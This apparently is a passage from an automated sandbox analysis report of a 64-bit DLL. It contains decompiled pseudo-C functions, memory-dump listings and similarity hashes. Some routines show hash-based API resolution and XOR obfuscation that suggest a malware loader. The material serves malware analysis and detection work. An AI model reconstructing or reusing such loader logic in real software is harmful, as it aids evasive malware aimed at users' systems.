                          				 *(0x7ff88c070000 + 0x44810 + _t121 * 8) = _t95 ^ _t114;
                          				return 0;
                          			}



















                          0x7ff88c07f320
                          0x7ff88c07f325
                          0x7ff88c07f32a
                          0x7ff88c07f33c
                          0x7ff88c07f357
                          0x7ff88c07f35e
                          0x7ff88c07f368
                          0x7ff88c07f370
                          0x7ff88c07f376
                          0x7ff88c07f37f
                          0x7ff88c07f381
                          0x7ff88c07f384
                          0x7ff88c07f38c
                          0x7ff88c07f395
                          0x7ff88c07f3a0
                          0x7ff88c07f3a5
                          0x7ff88c07f3a7
                          0x7ff88c07f3b6
                          0x7ff88c07f3bc
                          0x7ff88c07f3c8
                          0x7ff88c07f3d3
                          0x7ff88c07f3d5
                          0x7ff88c07f3dd
                          0x7ff88c07f3e3
                          0x7ff88c07f3e6
                          0x7ff88c07f3f4
                          0x7ff88c07f3f9
                          0x7ff88c07f401
                          0x7ff88c07f406
                          0x7ff88c07f406
                          0x7ff88c07f406
                          0x7ff88c07f411
                          0x7ff88c07f416
                          0x7ff88c07f41f
                          0x7ff88c07f428
                          0x7ff88c07f43a
                          0x7ff88c07f442
                          0x7ff88c07f44b
                          0x7ff88c07f44d
                          0x7ff88c07f466
                          0x7ff88c07f46c
                          0x7ff88c07f474
                          0x7ff88c07f47d
                          0x7ff88c07f47f
                          0x7ff88c07f493
                          0x7ff88c07f499
                          0x7ff88c07f4bf

                          APIs
                          • GetProcAddress.KERNEL32(?,0000A7D9DF492A3C,00000004,00007FF88C07F647,?,?,00000000,00007FF88C07F1C7,?,?,0000A7D9DF492A3C,00007FF88C07E6A9), ref: 00007FF88C07F442
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID:
                          • API String ID: 190572456-0
                          • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                          • Instruction ID: ad442c374d198475d172c28cd7714dc872b14ccb20cb11012f1bc2924181d778
                          • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                          • Instruction Fuzzy Hash: 304146A1B0EA4A82FE299B52E8142756391BF66BE0F198535DE1D4B78CEF3DE401C344
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 32%
                          			E00007FF87FF88C084EEC(void* __edx, long long __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                          				intOrPtr _v32;
                          				long long _v40;
                          				void* _t11;
                          				long long _t49;
                          
                          				_a8 = __rbx;
                          				_a16 = __rbp;
                          				_a24 = __rsi;
                          				if (__rcx != 0) goto 0x8c084f28;
                          				_t11 = E00007FF87FF88C07E6A0(__rax);
                          				 *((intOrPtr*)(__rax)) = 0x16;
                          				E00007FF87FF88C07E580(_t11);
                          				goto 0x8c084fc9;
                          				if (__rdx == 0) goto 0x8c084f11;
                          				E00007FF87FF88C07F4C0();
                          				_v32 = 0;
                          				r15d = 0;
                          				 *__rdx = _t49;
                          				r15b = 0 == 0;
                          				_v40 = _t49;
                          				r9d = r9d | 0xffffffff;
                          				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x8c084f6f;
                          				E00007FF87FF88C07E630(GetLastError(), __rax, __rbx);
                          				goto 0x8c084f21;
                          				E00007FF87FF88C07E154(__rax, _t14 + _t14);
                          				if (__rax == 0) goto 0x8c084fbf;
                          				_v32 = r14d;
                          				r9d = r9d | 0xffffffff;
                          				_v40 = __rax;
                          				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x8c084fb1;
                          				E00007FF87FF88C07E630(GetLastError(), __rax, __rax);
                          				goto 0x8c084fbf;
                          				 *__rdx = __rax;
                          				E00007FF87FF88C07E114(__rax, _t49);
                          				return 1;
                          			}







                          0x7ff88c084eec
                          0x7ff88c084ef1
                          0x7ff88c084ef6
                          0x7ff88c084f0f
                          0x7ff88c084f11
                          0x7ff88c084f16
                          0x7ff88c084f1c
                          0x7ff88c084f23
                          0x7ff88c084f2b
                          0x7ff88c084f2d
                          0x7ff88c084f34
                          0x7ff88c084f38
                          0x7ff88c084f3b
                          0x7ff88c084f3e
                          0x7ff88c084f42
                          0x7ff88c084f4a
                          0x7ff88c084f5e
                          0x7ff88c084f68
                          0x7ff88c084f6d
                          0x7ff88c084f75
                          0x7ff88c084f80
                          0x7ff88c084f82
                          0x7ff88c084f87
                          0x7ff88c084f8e
                          0x7ff88c084fa0
                          0x7ff88c084faa
                          0x7ff88c084faf
                          0x7ff88c084fb7
                          0x7ff88c084fc2
                          0x7ff88c084fe1

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide$AllocateHeap_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1500607604-0
                          • Opcode ID: 68226cd7c6c8364906c3fc8632874d394513f4a7677611d84de0b260f5baa58c
                          • Instruction ID: 4aac6d474f6ee7f53c4b8f524053b0a6974bde5acd8e38c0170b8cae9182a301
                          • Opcode Fuzzy Hash: 68226cd7c6c8364906c3fc8632874d394513f4a7677611d84de0b260f5baa58c
                          • Instruction Fuzzy Hash: E5210271A09B5245EE64AFA6EC10139A2E5BF96BD0F044534ED5D477AEEF3CE400C200
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00007FF87FF88C086400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                          				signed int _t27;
                          				signed int _t28;
                          				signed int _t29;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t43;
                          				signed int _t44;
                          				signed int _t45;
                          				signed int _t47;
                          				void* _t52;
                          
                          				_a8 = __rbx;
                          				_a16 = __rsi;
                          				_t27 = __ecx & 0x0000001f;
                          				if ((__ecx & 0x00000008) == 0) goto 0x8c086431;
                          				if (__edx >= 0) goto 0x8c086431;
                          				E00007FF87FF88C086BDC(_t27, _t52);
                          				_t28 = _t27 & 0xfffffff7;
                          				goto 0x8c086488;
                          				_t43 = 0x00000004 & dil;
                          				if (_t43 == 0) goto 0x8c08644c;
                          				asm("dec eax");
                          				if (_t43 >= 0) goto 0x8c08644c;
                          				E00007FF87FF88C086BDC(_t28, _t52);
                          				_t29 = _t28 & 0xfffffffb;
                          				goto 0x8c086488;
                          				_t44 = dil & 0x00000001;
                          				if (_t44 == 0) goto 0x8c086468;
                          				asm("dec eax");
                          				if (_t44 >= 0) goto 0x8c086468;
                          				E00007FF87FF88C086BDC(_t29, _t52);
                          				_t30 = _t29 & 0xfffffffe;
                          				goto 0x8c086488;
                          				_t45 = dil & 0x00000002;
                          				if (_t45 == 0) goto 0x8c086488;
                          				asm("dec eax");
                          				if (_t45 >= 0) goto 0x8c086488;
                          				if ((dil & 0x00000010) == 0) goto 0x8c086485;
                          				E00007FF87FF88C086BDC(_t30, _t52);
                          				_t31 = _t30 & 0xfffffffd;
                          				_t47 = dil & 0x00000010;
                          				if (_t47 == 0) goto 0x8c0864a2;
                          				asm("dec eax");
                          				if (_t47 >= 0) goto 0x8c0864a2;
                          				E00007FF87FF88C086BDC(_t31, _t52);
                          				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                          			}













                          0x7ff88c086400
                          0x7ff88c086405
                          0x7ff88c086414
                          0x7ff88c08641c
                          0x7ff88c086420
                          0x7ff88c086427
                          0x7ff88c08642c
                          0x7ff88c08642f
                          0x7ff88c086436
                          0x7ff88c086439
                          0x7ff88c08643b
                          0x7ff88c086440
                          0x7ff88c086442
                          0x7ff88c086447
                          0x7ff88c08644a
                          0x7ff88c08644c
                          0x7ff88c086450
                          0x7ff88c086452
                          0x7ff88c086457
                          0x7ff88c08645e
                          0x7ff88c086463
                          0x7ff88c086466
                          0x7ff88c086468
                          0x7ff88c08646c
                          0x7ff88c08646e
                          0x7ff88c086473
                          0x7ff88c086479
                          0x7ff88c086480
                          0x7ff88c086485
                          0x7ff88c086488
                          0x7ff88c08648c
                          0x7ff88c08648e
                          0x7ff88c086493
                          0x7ff88c08649a
                          0x7ff88c0864b8

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                          • Instruction ID: 9f05eccc43f1acaa2d228e4acda60c3f4aaa29cae909a08e6ab9e3b9b8ffb7ff
                          • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                          • Instruction Fuzzy Hash: F3116D26E1861209FE781126DC8237D11C1FF573F4E4ADA34EA7E0A6DECF2CA880C211
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E00007FF87FF88C084898(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
                          				intOrPtr _v0;
                          				signed long long _v8;
                          				int _t33;
                          				long _t37;
                          				void* _t38;
                          				signed int _t39;
                          				int _t48;
                          				signed long long _t60;
                          				short* _t65;
                          				signed int* _t66;
                          				void* _t82;
                          				void* _t89;
                          				void* _t95;
                          				void* _t98;
                          				void* _t101;
                          				void* _t102;
                          
                          				_a8 = __rbx;
                          				_a24 = __rbp;
                          				E00007FF87FF88C087050(_t38, __rax, __rcx, _t82, __r8, _t95, _t98);
                          				_t60 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				_a5176 = _t60 ^ _t89 - __rax;
                          				r14d = r9d;
                          				r10d = r10d & 0x0000003f;
                          				_t102 = _t101 + __r8;
                          				 *__rcx =  *__rcx & 0x00000000;
                          				__rcx[1] =  *((intOrPtr*)(0x8c0b4970 + (__edx >> 6) * 8));
                          				if (__r8 - _t102 >= 0) goto 0x8c0849db;
                          				_t65 =  &_a40;
                          				if (__r8 - _t102 >= 0) goto 0x8c084943;
                          				_t39 =  *__r8 & 0x0000ffff;
                          				if (_t39 != 0xa) goto 0x8c08492f;
                          				 *_t65 = 0xd;
                          				_t66 = _t65 + 2;
                          				 *_t66 = _t39;
                          				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x8c084911;
                          				_a16 = _a16 & 0x00000000;
                          				_a8 = _a8 & 0x00000000;
                          				_v0 = 0xd55;
                          				_v8 =  &_a1752;
                          				r9d = 0;
                          				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                          				_t48 = _t33;
                          				if (_t33 == 0) goto 0x8c0849d3;
                          				if (_t33 == 0) goto 0x8c0849c3;
                          				_v8 = _v8 & 0x00000000;
                          				r8d = _t48;
                          				r8d = r8d;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c0849d3;
                          				if (0 + _a24 - _t48 < 0) goto 0x8c084990;
                          				__rcx[1] = __edi - r15d;
                          				goto 0x8c084906;
                          				_t37 = GetLastError();
                          				 *__rcx = _t37;
                          				E00007FF87FF88C086D80();
                          				return _t37;
                          			}



















                          0x7ff88c084898
                          0x7ff88c08489d
                          0x7ff88c0848af
                          0x7ff88c0848b7
                          0x7ff88c0848c1
                          0x7ff88c0848d2
                          0x7ff88c0848e0
                          0x7ff88c0848e4
                          0x7ff88c0848fc
                          0x7ff88c0848ff
                          0x7ff88c084906
                          0x7ff88c08490c
                          0x7ff88c084914
                          0x7ff88c084916
                          0x7ff88c084921
                          0x7ff88c084928
                          0x7ff88c08492b
                          0x7ff88c08492f
                          0x7ff88c084941
                          0x7ff88c084943
                          0x7ff88c08494e
                          0x7ff88c08495c
                          0x7ff88c08496f
                          0x7ff88c084974
                          0x7ff88c08497e
                          0x7ff88c084984
                          0x7ff88c084988
                          0x7ff88c08498e
                          0x7ff88c084990
                          0x7ff88c0849a5
                          0x7ff88c0849ae
                          0x7ff88c0849b9
                          0x7ff88c0849c1
                          0x7ff88c0849c8
                          0x7ff88c0849ce
                          0x7ff88c0849d3
                          0x7ff88c0849d9
                          0x7ff88c0849e9
                          0x7ff88c084a09

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ByteCharErrorFileLastMultiWideWrite
                          • String ID: U
                          • API String ID: 2456169464-4171548499
                          • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                          • Instruction ID: 8fa2b08fffa43b06e5ecaa749f1964bd7c446f61c31b3704f87496a2bbdd7127
                          • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                          • Instruction Fuzzy Hash: DD41A222B19A4182EB708F66E8553AA77A0FB897D4F408131EE8D8779CDF3CD505CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 19%
                          			E0000027E27ED371A238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
                          				char _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t41;
                          				void* _t43;
                          				long long* _t82;
                          				long long _t83;
                          				long long _t84;
                          				intOrPtr _t108;
                          				void* _t109;
                          				intOrPtr _t110;
                          				void* _t112;
                          				void* _t115;
                          				long long* _t118;
                          				void* _t130;
                          				long _t133;
                          				void* _t134;
                          				long _t136;
                          				void* _t139;
                          
                          				_t84 = __rbx;
                          				_t82 = _t118;
                          				 *((long long*)(_t82 + 8)) = __rbx;
                          				 *((long long*)(_t82 + 0x18)) = __r8;
                          				_t3 = _t82 + 0x20; // 0xfb849fa7
                          				_t134 = __rcx;
                          				E0000027E27ED37124B0(__rbx, _t3, _t112);
                          				if (_t82 == 0) goto 0xd371a3dc;
                          				E0000027E27ED371908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t82 == 0) goto 0xd371a29f;
                          				_v88 =  *_t82();
                          				goto 0xd371a2a5;
                          				_v88 = 0;
                          				_t10 = _t82 + 1; // 0x1
                          				r8d = _t109 + _t10;
                          				HeapAlloc(_t139, _t136, _t133);
                          				_v80 = _t82;
                          				if (_t82 == 0) goto 0xd371a3ce;
                          				0xd37147b0();
                          				_t13 = _t109 + 1; // 0x1
                          				r8d = _t13;
                          				0xd37147b0();
                          				E0000027E27ED371908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t82 == 0) goto 0xd371a30d;
                          				 *_t82();
                          				goto 0xd371a30f;
                          				_t16 =  &_a32; // 0xfb84a007
                          				_t17 =  &_v72; // 0xfb849f9f
                          				r8d = 0;
                          				_v104 = _t16;
                          				_t41 = E0000027E27ED3717CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0xd371d458 + 8)), _t17, _t130, _t109);
                          				HeapFree(??, ??, ??);
                          				if (_t41 != 0) goto 0xd371a3ce;
                          				r8d = _a32;
                          				_t108 = _v72;
                          				_t21 =  &_v88; // 0xfb849f8f
                          				_t83 = _t21;
                          				_t22 =  &_v80; // 0xfb849f87
                          				_v104 = _t83;
                          				_t43 = E0000027E27ED37152B8(_t84, _t108, _t82,  *((intOrPtr*)( *0xd371d458 + 8)), _t22, _t112, _t115);
                          				_t110 = _v80;
                          				if (_v88 == 0) goto 0xd371a389;
                          				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0xd371a389;
                          				if (_t134 - 1 != 0) goto 0xd371a37a;
                          				 *((char*)(_t83 + _t110)) = 0;
                          				if (_t43 != 0) goto 0xd371a3b0;
                          				E0000027E27ED3717500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0xd371d458 + 8)));
                          				if (_t83 != 0) goto 0xd371a3a5;
                          				_t29 = _t83 + 8; // 0x8
                          				goto 0xd371a3b0;
                          				 *_a24 = _t83;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				return _t29;
                          			}


























                          0x27ed371a238
                          0x27ed371a238
                          0x27ed371a23b
                          0x27ed371a23f
                          0x27ed371a25c
                          0x27ed371a265
                          0x27ed371a26d
                          0x27ed371a278
                          0x27ed371a288
                          0x27ed371a290
                          0x27ed371a299
                          0x27ed371a29d
                          0x27ed371a2a1
                          0x27ed371a2b1
                          0x27ed371a2b1
                          0x27ed371a2b6
                          0x27ed371a2bf
                          0x27ed371a2c7
                          0x27ed371a2dd
                          0x27ed371a2e2
                          0x27ed371a2e2
                          0x27ed371a2ed
                          0x27ed371a2fc
                          0x27ed371a304
                          0x27ed371a309
                          0x27ed371a30b
                          0x27ed371a30f
                          0x27ed371a317
                          0x27ed371a31c
                          0x27ed371a31f
                          0x27ed371a32a
                          0x27ed371a339
                          0x27ed371a341
                          0x27ed371a347
                          0x27ed371a34f
                          0x27ed371a354
                          0x27ed371a354
                          0x27ed371a359
                          0x27ed371a361
                          0x27ed371a366
                          0x27ed371a36f
                          0x27ed371a378
                          0x27ed371a381
                          0x27ed371a387
                          0x27ed371a38b
                          0x27ed371a391
                          0x27ed371a396
                          0x27ed371a39e
                          0x27ed371a3a0
                          0x27ed371a3a3
                          0x27ed371a3ad
                          0x27ed371a3b8
                          0x27ed371a3c8
                          0x27ed371a3d6
                          0x27ed371a3f5

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID:
                          • API String ID: 1659099196-0
                          • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction ID: 387d42fcc3f546c77755f1722bcd8ff6fba252c77e7b6963d4e41552eb11698a
                          • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction Fuzzy Hash: 13419F33708B81C9EFA4CB56A84875BA7A9FBCEBC4F0550659E4E43786EF38C5058720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 41%
                          			E0000027E27ED3712DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                          				intOrPtr _v88;
                          				void* _v96;
                          				void* _v104;
                          				long long _v112;
                          				signed int _v120;
                          				long long _v128;
                          				long long _v136;
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t72;
                          				signed int _t80;
                          				void* _t81;
                          				void* _t97;
                          				signed int _t98;
                          				void* _t99;
                          				void* _t114;
                          				long long* _t139;
                          				signed long long _t140;
                          				long long* _t142;
                          				void* _t143;
                          				void* _t169;
                          				void* _t170;
                          				void* _t172;
                          				signed int _t173;
                          				long _t177;
                          				void* _t179;
                          				void* _t190;
                          				void* _t191;
                          				void* _t192;
                          				signed int* _t193;
                          				long long _t194;
                          				void* _t200;
                          				long _t202;
                          				void* _t205;
                          
                          				_t191 = _t179;
                          				 *((long long*)(_t191 + 0x18)) = __r8;
                          				 *((long long*)(_t191 + 0x10)) = __rdx;
                          				_t203 =  *0xd371d458;
                          				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
                          				_t170 = __rcx;
                          				_v120 =  *0xd371d450;
                          				r15d = 0;
                          				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
                          				_v112 =  *((intOrPtr*)( *0xd371d458 + 8));
                          				if (E0000027E27ED3714320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0xd3712e29;
                          				_t12 = _t205 + 1; // 0x1
                          				r12d = _t12;
                          				_v104 = _t172;
                          				goto 0xd3712e34;
                          				_t173 = _v104;
                          				r12d = 2;
                          				_t15 =  &_a32; // 0xca
                          				if (E0000027E27ED3714880(r12d, _t114,  *((intOrPtr*)( *0xd371d458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0xd3712f94;
                          				r8d = _a32;
                          				r13d = r8d;
                          				r13d = r13d - r12d;
                          				_t193 = _v96;
                          				if (_t173 == 0) goto 0xd3712e8d;
                          				_t72 = _a8;
                          				_t193[0xa] = 1;
                          				_t193[0x12] = _t173;
                          				_t193[0xd] = _t72;
                          				_t193[0x10] = _t72;
                          				_t25 = _t170 + 0xc0; // 0xc0
                          				r9d = 0;
                          				 *_t193 = _v120 ^ 0x62ade362;
                          				_t193[3] =  *(_t170 + 0x48);
                          				_t193[2] =  *(_t170 + 0x4c);
                          				_t30 =  &_a8; // 0xb2
                          				_v128 = _t30;
                          				_t32 =  &_v120; // 0x32
                          				_v136 = _t32;
                          				_t97 = E0000027E27ED3711BFC(_t32, _t143, _t25, _t193);
                          				HeapFree(_t205, _t202, _t200);
                          				if (r13d == 0) goto 0xd3712f01;
                          				if (_t97 == 0) goto 0xd3712ef6;
                          				if (_t97 != 0x10d2) goto 0xd3712f01;
                          				E0000027E27ED371A3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
                          				if (_t97 != 0) goto 0xd3712f94;
                          				_t98 = _a8;
                          				_t194 = _v120;
                          				r13d =  *(_t170 + 0x4c);
                          				_t80 = E0000027E27ED3716C1C(_t98, _t194);
                          				_t38 =  &_a8; // 0xb2
                          				r9d = 1;
                          				 *(_t170 + 0x48) = _t98;
                          				 *(_t170 + 0x4c) = _t80;
                          				_t81 = E0000027E27ED3717B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
                          				_t99 = _t81;
                          				if (_t81 != 0) goto 0xd3712f71;
                          				_t139 = _a16;
                          				 *_t139 = _t194;
                          				 *_a24 = _a8;
                          				if ( *(_t170 + 0x4c) != r13d) goto 0xd3712fcd;
                          				goto 0xd3712fc7;
                          				HeapFree(_t172, _t177, _t143);
                          				_t47 = _t170 + 0xc0; // 0xc0
                          				E0000027E27ED37147B8(_t99, _t139, _t143, _t47, _t177);
                          				goto 0xd3712faf;
                          				if (_t99 == 0x10d2) goto 0xd3712fc2;
                          				_t48 = _t170 + 0xc0; // 0xc0
                          				if (E0000027E27ED37147B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0xd3712fcd;
                          				asm("lock or dword [edi+0xec], 0x1");
                          				goto 0xd3712fcd;
                          				r15d = 1;
                          				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0xd371302f;
                          				E0000027E27ED371908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t139 == 0) goto 0xd3712fed;
                          				 *_t139();
                          				if (r15d == 0) goto 0xd371301c;
                          				_t140 =  *((intOrPtr*)(_t170 + 0x58));
                          				if (_v88 - _t140 <= 0) goto 0xd371301c;
                          				_t57 = _t170 + 0xc0; // 0xc1
                          				if (E0000027E27ED37147B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0xd371301c;
                          				asm("lock or dword [edi+0xec], 0x1");
                          				_t142 = _t140 * 0x23c34600 + _v88;
                          				 *((long long*)(_t170 + 0x58)) = _t142;
                          				if (_v104 == 0) goto 0xd371308e;
                          				HeapFree(??, ??, ??);
                          				if (_t99 == 0) goto 0xd371304e;
                          				if (_t99 != 0x10d2) goto 0xd371308e;
                          				E0000027E27ED371908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t142 == 0) goto 0xd3713067;
                          				 *_t142();
                          				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
                          				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
                          				E0000027E27ED371908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
                          				if (_t142 == 0) goto 0xd371308e;
                          				 *_t142();
                          				return _t99;
                          			}







































                          0x27ed3712dc4
                          0x27ed3712dc7
                          0x27ed3712dcb
                          0x27ed3712ddf
                          0x27ed3712de6
                          0x27ed3712deb
                          0x27ed3712dfc
                          0x27ed3712e04
                          0x27ed3712e07
                          0x27ed3712e0e
                          0x27ed3712e1a
                          0x27ed3712e1e
                          0x27ed3712e1e
                          0x27ed3712e22
                          0x27ed3712e27
                          0x27ed3712e29
                          0x27ed3712e2e
                          0x27ed3712e34
                          0x27ed3712e50
                          0x27ed3712e56
                          0x27ed3712e5e
                          0x27ed3712e61
                          0x27ed3712e64
                          0x27ed3712e6c
                          0x27ed3712e6e
                          0x27ed3712e75
                          0x27ed3712e7e
                          0x27ed3712e83
                          0x27ed3712e88
                          0x27ed3712e91
                          0x27ed3712e98
                          0x27ed3712ea3
                          0x27ed3712eaa
                          0x27ed3712eb2
                          0x27ed3712eb7
                          0x27ed3712ebf
                          0x27ed3712ec4
                          0x27ed3712ec9
                          0x27ed3712edd
                          0x27ed3712edf
                          0x27ed3712ee8
                          0x27ed3712eec
                          0x27ed3712ef4
                          0x27ed3712efc
                          0x27ed3712f03
                          0x27ed3712f09
                          0x27ed3712f10
                          0x27ed3712f15
                          0x27ed3712f1e
                          0x27ed3712f23
                          0x27ed3712f2b
                          0x27ed3712f37
                          0x27ed3712f3a
                          0x27ed3712f3d
                          0x27ed3712f42
                          0x27ed3712f46
                          0x27ed3712f48
                          0x27ed3712f58
                          0x27ed3712f67
                          0x27ed3712f6d
                          0x27ed3712f6f
                          0x27ed3712f7e
                          0x27ed3712f84
                          0x27ed3712f8d
                          0x27ed3712f92
                          0x27ed3712f9a
                          0x27ed3712f9c
                          0x27ed3712fb1
                          0x27ed3712fb3
                          0x27ed3712fc0
                          0x27ed3712fc7
                          0x27ed3712fd1
                          0x27ed3712fdc
                          0x27ed3712fe4
                          0x27ed3712feb
                          0x27ed3712ff0
                          0x27ed3712ff2
                          0x27ed3712ffb
                          0x27ed3712ffd
                          0x27ed371300d
                          0x27ed371300f
                          0x27ed3713026
                          0x27ed371302b
                          0x27ed3713032
                          0x27ed371303c
